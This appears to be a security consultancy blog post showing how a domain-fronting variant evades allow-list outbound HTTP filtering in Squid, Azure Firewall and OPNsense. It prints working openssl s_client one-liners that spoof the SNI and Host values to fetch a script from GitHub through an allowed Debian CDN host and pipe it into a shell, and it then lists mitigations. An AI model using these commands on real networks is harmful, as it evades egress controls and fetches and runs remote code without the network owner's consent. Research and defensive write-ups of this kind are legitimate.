HTTP Really Isn't That Simple (and by extension Neither Is Your Outbound Web Filtering, Actually)

Oct 6 2025

This article takes a close look at what stands in the way of filtering outbound HTTP to the wider web in a restricted server environment, shows how to evade typical filtering configuration using a relative of domain fronting, and presents some ideas for ways to plug this gap.

Pentesters love to simply declare that something is possible in the abstract. “You have to encode your user’s input before you re-render it”, “make sure the system only accepts passwords with 16 characters or more”, “filter the outbound Internet connectivity of your server environment”, and so on.

Wouldn’t it be nice if we also had some ideas about how to practically implement these measures, as well? Often our assertions can hide surprising amounts of underlying complexity that make “why don’t you just…” statements hard to respond to.

Let’s pick an easy one for this blog post: filtering outbound Internet connectivity from a server environment. We want an allow-list of web resources that are allowed, and block everything else. Totally doable, right? A simple protocol, a simple requirement that basically every environment must have solved years ago?

Somewhere to start from

Easy one. We grab a little reference Squid configuration that I’ve been using for years for just this purpose. We’re going to allow deb.debian.org and nothing else:

# /etc/squid/squid.conf
http_port 3128
access_log /var/log/squid/access.log squid
cache deny all
## Allow only tunnelled HTTPS connections
acl HTTPS port 443
acl CONNECT method CONNECT
http_access deny !HTTPS
http_access deny !CONNECT
## Site access policies
acl source-internal src 192.0.2.0/24
acl sites-generic dstdomain deb.debian.org
http_access allow source-internal sites-generic
http_access deny all
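
Spinning this up is quick. A minimal sketch for a Debian-style host where the squid package ships a systemd unit (package and service names are assumptions; adjust for your distro):

$ sudo squid -k parse              # sanity-check the configuration for syntax errors
$ sudo systemctl restart squid     # (re)start the proxy with the new configuration
$ sudo tail -f /var/log/squid/access.log   # watch requests arrive while testing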

With the proxy running, give it a little test to make sure it does what we want:

$ curl --proxy http://localhost:3128/ -i -s https://deb.debian.org/ | head -n 1
HTTP/1.1 200 Connection established
$ curl --proxy http://localhost:3128/ -i -s https://raw.githubusercontent.com/fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh | head -n 1
HTTP/1.1 403 Forbidden

Perfect! But… HTTP has been in the news again lately, hasn’t it… To be extra sure this is all working as intended and can’t be bypassed by an attacker, let’s try a few simple things that a normal HTTP client wouldn’t do by default, using OpenSSL’s s_client to make a direct TLS connection through the proxy and piping some HTTP in from bash:

$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -proxy localhost:3128 -servername raw.githubusercontent.com -connect deb.debian.org:443 | fgrep echo | sh -x
+ echo As promised, completely safe.
As promised, completely safe.

Our harmless-shell-script.sh file came back through Squid instead of being blocked like before :( How did that request bypass our filtering and reach GitHub?! Being able to access GitHub seems like a fairly serious hole in our security design here.

Let’s check what Squid thinks happened:

# tail -n3 /var/log/squid/access.log
1758253715.023 1002 127.0.0.1 TCP_TUNNEL/200 5933 CONNECT deb.debian.org:443 - HIER_DIRECT/2a04:4e42:37::644 -
1758253723.099 1 127.0.0.1 TCP_DENIED/403 3850 CONNECT github.com:443 - HIER_NONE/- text/html
1758253727.674 279 ::1 TCP_TUNNEL/200 4631 CONNECT deb.debian.org:443 - HIER_DIRECT/2a04:4e42:37::644 -

As far as Squid is concerned we are connecting to an allowed destination (deb.debian.org) and therefore everything is just fine. Why can’t Squid tell that we’re actually connecting to GitHub and not downloading a Debian package?

It’s that classic security dilemma again: multiple protocol layers, each with its own independent idea of which part of the request to look at, and a surprising gap in behaviour that emerges when those layers just don’t happen to align.

Where did “name-based routing” in HTTP requests come from?

Understanding this situation requires a bit of the complex history of the HTTP protocol, along with a look at how HTTP and TLS behave together.

The concept of a proxy as a network element has existed since the 1980s, and the first web proxy (implemented in CERN’s httpd) debuted some time around 1993, along with NCSA Mosaic. The intervening 32 years have seen many free and open source web proxies developed and made available, but Squid remains the “reference” implementation in many ways, and is still very popular.

Since 1997, the HTTP/1.1 standard has required both clients and servers to support a Host header in requests. This marked a major change from previous HTTP behaviour and effectively decoupled a particular URL (e.g. https://example.com/) from a specific IP address and TCP port. This change didn’t make it into widespread use with HTTPS until the early 21st century – if you ever had to beg APNIC for more IPv4 addresses for “SSL certificates” in 2007 you will be familiar with this problem.

Here’s what a super basic HTTP/1.1 request might look like on the wire:

GET /cat-pictures-please HTTP/1.1
Host: example.com

The Host header here specifies the hostname of the server we want to talk to, since at this point we have almost certainly connected to an IP address that is serving multiple hostnames, and this needs to be explicitly specified to disambiguate the request.

Decoupling URLs from specific IP addresses and ports helped slow the inevitable exhaustion of IPv4 addresses, and paved the way for more flexible web application topologies. Through name-based routing, content distribution networks (CDNs) could bring static assets closer to end users and reduce request latencies.

Over time, web server operators came to rely on this behaviour and re-numbering or changing the routing of web services “on the fly” became normal. DNS records for the hostname portion of web URLs became subject to change without notice. For instance, many CDN operators maintain pools of cache nodes and configure a given hostname with DNS records for just a handful of these, dynamically swapping them out as needed to deal with network conditions, hardware failure and so on.
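
You can watch this churn yourself with a couple of quick lookups (output deliberately omitted here, because it will vary between resolvers and over time, which is rather the point):

$ dig +short deb.debian.org A
$ dig +short deb.debian.org AAAA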

And for us? The end of the direct mapping between IP addresses and URLs meant something important for security: web access control could no longer be carried out at the network layer, and a full application-layer proxy became necessary.

What does this mean for web filtering?

To understand how these multiple routing decisions allowed us to bypass the proxy, let’s run through an example malicious HTTP request in detail. Routing decisions for an HTTPS request are made in at least three places we can typically control. The major locations, in the order they are evaluated (and in roughly increasing order of fiddliness to attack), are:

  1. Before the TCP connection: the DNS lookup, for instance mapping example.com to 192.0.2.1.
  2. Establishing the TLS session: the TLS Server Name Indication (SNI) protocol extension lets us ask the server “Please present a valid certificate for example.com on this connection”.
  3. Inside the TLS session: once the client validates that the presented certificate is acceptable and can be trusted for the requested hostname, it adds a Host HTTP request header inside the protected TLS tunnel, just like pre-TLS HTTP worked.

In a normal HTTP client, such as curl or a web browser, the hostnames at all three steps will typically be identical. There’s nothing in the protocols themselves that enforces this consistency, though, and by using a custom HTTP client (in our case assembled from bash and OpenSSL’s s_client tool, both of which are readily available on almost any Linux host you’re likely to find yourself on) we can start to make requests where we control the hostname at each step individually.
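
To make that concrete, here is roughly which knob controls which step. The hostnames and IP address below are placeholders, and the flags assume reasonably recent curl and OpenSSL builds:

# Step 1 - where the TCP connection actually goes (overriding the DNS answer):
$ curl --connect-to allowed.example.net:443:203.0.113.10:443 https://allowed.example.net/
# Step 2 - the TLS SNI value presented in the ClientHello:
$ openssl s_client -connect allowed.example.net:443 -servername something-else.example.org
# Step 3 - the Host header written inside the established TLS tunnel:
$ curl -H 'Host: something-else.example.org' https://allowed.example.net/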

Stepping through how these routing opportunities are going to be evaluated in our scenario:

  1. Our s_client instructs our Squid to connect to deb.debian.org on port 443. This matches an “allow” ACL in Squid, so the connection succeeds, and Squid starts proxying the traffic. ✅

  2. Fastly, CDN provider to Debian, receives a TCP connection from our Squid. The TCP connection contains a TLS session where the handshake asks for the Server Name raw.githubusercontent.com. Fastly provides CDN service to an enormous number of websites, including GitHub, so this connection succeeds. ✅

  3. Our s_client makes a TLS-secured HTTP request including the Host header for raw.githubusercontent.com. Fastly makes the backend request and provides the content. ✅

We selected raw.githubusercontent.com here because GitHub provides a convenient (and kinda bi-directional) communications channel for an attacker. Finding other services hosted by Fastly that can be similarly abused, or indeed just signing up for your own CDN account at any provider where this works, is left as an exercise for the attacker.

How do we fix it?

You might be thinking “can’t we make Squid look at the Server Name as well?” and… yes. Squid has a variety of options for TLS termination and inspection, and it can be configured to validate the TLS SNI hostname, provided it is compiled against OpenSSL. It is also important to note that the default GnuTLS version of Squid shipped in many distros does not support this operation, and will silently fail to filter SNI if you attempt it!

If you ensure you’ve installed your distro’s -openssl variant of the Squid package you can add some TLS inspection configuration:

ssl_bump peek all
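
On its own that single line is a simplification: Squid only consults ssl_bump rules on ports carrying the ssl-bump flag (which generally needs a certificate configured, tls-cert= on Squid 4 and later), and you still need an ACL that matches the peeked server name. A common peek-and-splice arrangement for SNI filtering looks something like the sketch below; this is a hedged example of the general pattern rather than the exact configuration used for the tests in this post, the certificate path is a placeholder, and the http_port line replaces the plain one from the earlier configuration:

http_port 3128 ssl-bump tls-cert=/etc/squid/bump-placeholder.pem
acl step1 at_step SslBump1
acl allowed-sni ssl::server_name deb.debian.org
ssl_bump peek step1
ssl_bump splice allowed-sni
ssl_bump terminate all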

Even with SNI filtering like this in place, though, we still control the SNI value we send, so we can simply present an allowed one and make the same malicious connection:

$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -proxy localhost:3128 -servername deb.debian.org -connect deb.debian.org:443 | fgrep echo | sh -x
+ echo As promised, completely safe.
As promised, completely safe.

So, even with TLS peek enabled we can still evade our proxy filtering in this situation (and many others). This is because even though we passed an allowed SNI hostname (deb.debian.org) to the CDN cache node, and the cache node recognised this hostname and was able to serve a valid certificate for it, our Host request header still resulted in the CDN routing the request internally and bypassing the anticipated filtering.

This is great for us because it means any filter outside of the TLS session (like Squid in our example) is incapable of determining whether this request is to an allowed destination or not.

Didn’t CDNs Fix Domain Fronting?

If you’re familiar with censorship evasion or covert operations within other people’s networks, you’ll likely remember domain fronting, a technique that gained popularity in the 2010s. It became more difficult when CDN providers decided to disallow it, in some cases under pressure from various third parties.

Domain fronting typically relied on supplying the CDN cache node with differing hostnames for steps (2) and (3) in our sequence above, as part of a legitimate connection attempting to evade the notice of a censorship system. An outside observer intercepting the connection to block or snoop on it could read only the unencrypted SNI value, while the end client secretly requested its real destination at step (3), inside the secure tunnel established at step (2). This was used by projects such as Tor and Signal to evade national censorship in some countries.

Since the early 2020s some CDNs have blocked, or at least claimed to block, domain fronting. Recently published independent research suggests that, with the right techniques, domain fronting is still relatively alive and well, and since it’s what enables the attack against local filtering I describe in this post, I’m inclined to agree. The specific instance we show here works well, and grants access to useful endpoints (like GitHub) from networks with a fairly common configuration (allowed to access Debian repositories or GitHub services, for instance). This technique remains surprisingly viable as a method to bypass filtering HTTP proxies, even when TLS SNI inspection is enabled in the proxy.

Even in the best case, where you only need to restrict access in your server environment to websites you know are hosted with CDNs that prevent domain fronting… you are now at the whim of the CDN operator not to change that behaviour, inadvertently or intentionally, and of the website operator not to change CDNs without letting you know.

Is this actually fixable?

We’ve journeyed all the way from “HTTP is a simple protocol and can definitely be filtered at the network edge” to “can HTTP even be filtered at the network edge effectively?” and been exposed to a number of important security principles along the way:

  • The friction between different HTTP implementations.
  • Security assumptions that break down at implementation boundaries.
  • How "simple" protocols become complex in practice.

As is frequently the case in these blog posts, we have encountered another behavioural gap between the responsibilities of different systems, one that exposes a potential vulnerability.

So what can we do?

  • Make the configuration harder to exploit - at least ensure TLS SNI inspection is enabled in your outbound web proxy. This increases the proportion of the HTTP request that an attacker needs to control in order to bypass your restrictions, and potentially forces them to work around whatever anti-domain-fronting measures the CDN has in place.
  • Use a higher-level proxy - for instance, if you only need to install Debian or Ubuntu package updates in your environment, consider a proxy like apt-cacher-ng that makes arbitrary HTTP requests more difficult (there’s a small client-side sketch after this list).
  • Follow the principle of least privilege - carefully reduce the number of hosts in your environment that are allowed web access at all. Consider using a proxy policy to fully, or nearly fully, block all web requests for most hosts - this way if a host that isn’t expected to make an outbound connection suddenly attempts to, you can detect and alert on this as a strong indicator of malicious activity. Give an attacker plenty of opportunities to trip up and let you know they’re around :)
  • Avoid establishing an enterprise CA and doing full TLS interception - first of all, this means managing an entire PKI and all of its associated problems, which is a new problem in itself and much harder to get right than web filtering. Secondly, it breaks end-to-end security and is generally going to be a net security negative.
  • Where possible, restrict outbound proxy connections to only hosts on domains you control - especially when combined with a DNSSEC-aware stub resolver and pinned public keys for the domain, this makes for a solution that is very difficult to tamper with. You will likely need one or more higher-level proxies hosted within your own environment for specific APIs and applications that must be accessed externally.
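
As a taste of the higher-level proxy idea above, pointing apt at an apt-cacher-ng instance is a one-line client configuration. The hostname here is a placeholder for wherever you run it, and 3142 is apt-cacher-ng’s default listening port:

# /etc/apt/apt.conf.d/00proxy
Acquire::http::Proxy "http://apt-cacher.internal.example:3142";

Combined with a proxy or firewall policy that only lets the apt-cacher-ng host make outbound requests, the ordinary servers in the environment never need general web egress at all.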

Bonus: Exploiting this issue in Azure Firewall and OPNsense

If you’re lucky enough to have a $3.034/hour Azure Firewall that supports transparent HTTP interception and FQDN matching in Application Rules, does that mean you’re safe from this filtering bypass?

$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -servername raw.githubusercontent.com -connect deb.debian.org:443 | fgrep echo
802B4631527F0000:error:0A000126:SSL routines:ssl3_read_n:unexpected eof while reading:../ssl/record/rec_layer_s3.c:322:
$ echo -e "GET /fincham/completely-safe-repository/refs/heads/main/harmless-shell-script.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: Close\r\n\r\n" | openssl s_client -quiet -servername deb.debian.org -connect deb.debian.org:443 | fgrep echo
echo "As promised, completely safe."

Nope. Application Rules seem to do SNI inspection (similar to enabling peek in Squid), but for CDNs where domain fronting still works (e.g. most of them) this doesn’t really help.

Similarly, in our testing the standard Squid-based URL filtering offered in OPNsense was vulnerable to the same issue.

HTTP as an evolving landscape

Like most things in the security world, periodic re-validation of security assumptions is critical when you’re working in an evolving environment. HTTP is an enormously important component of basically all modern technology, and implementations constantly come, go, and morph to better handle new use cases and requirements. One way to make sure our recommendations as security folk are actually possible to implement is to maintain a reference solution based on free software. This way, even if the client’s vendor implementation can’t do the required thing, at least you can “always deploy [insert name of open source project] in a Docker container” and get the job done. And hey, you can apply that knowledge to your own internal infrastructure as well!

There is danger in resting on our laurels and assuming that, just because a particular configuration or control worked and was relevant 15 years ago, it is still relevant in today’s environments. The more we challenge ourselves to actually build reference implementations for the environments we wish to secure, the more likely we are to experience the actual day-to-day challenges our clients do, and that can only be a good thing when making relevant, informed security recommendations.

We haven’t even touched on HTTP/2 and its :authority pseudo-header here, or the HTTP/3 protocol. Further analysis is needed to see how these attacks apply to those protocols, and migrating to another protocol is going to give us another set of edge cases to investigate and address.

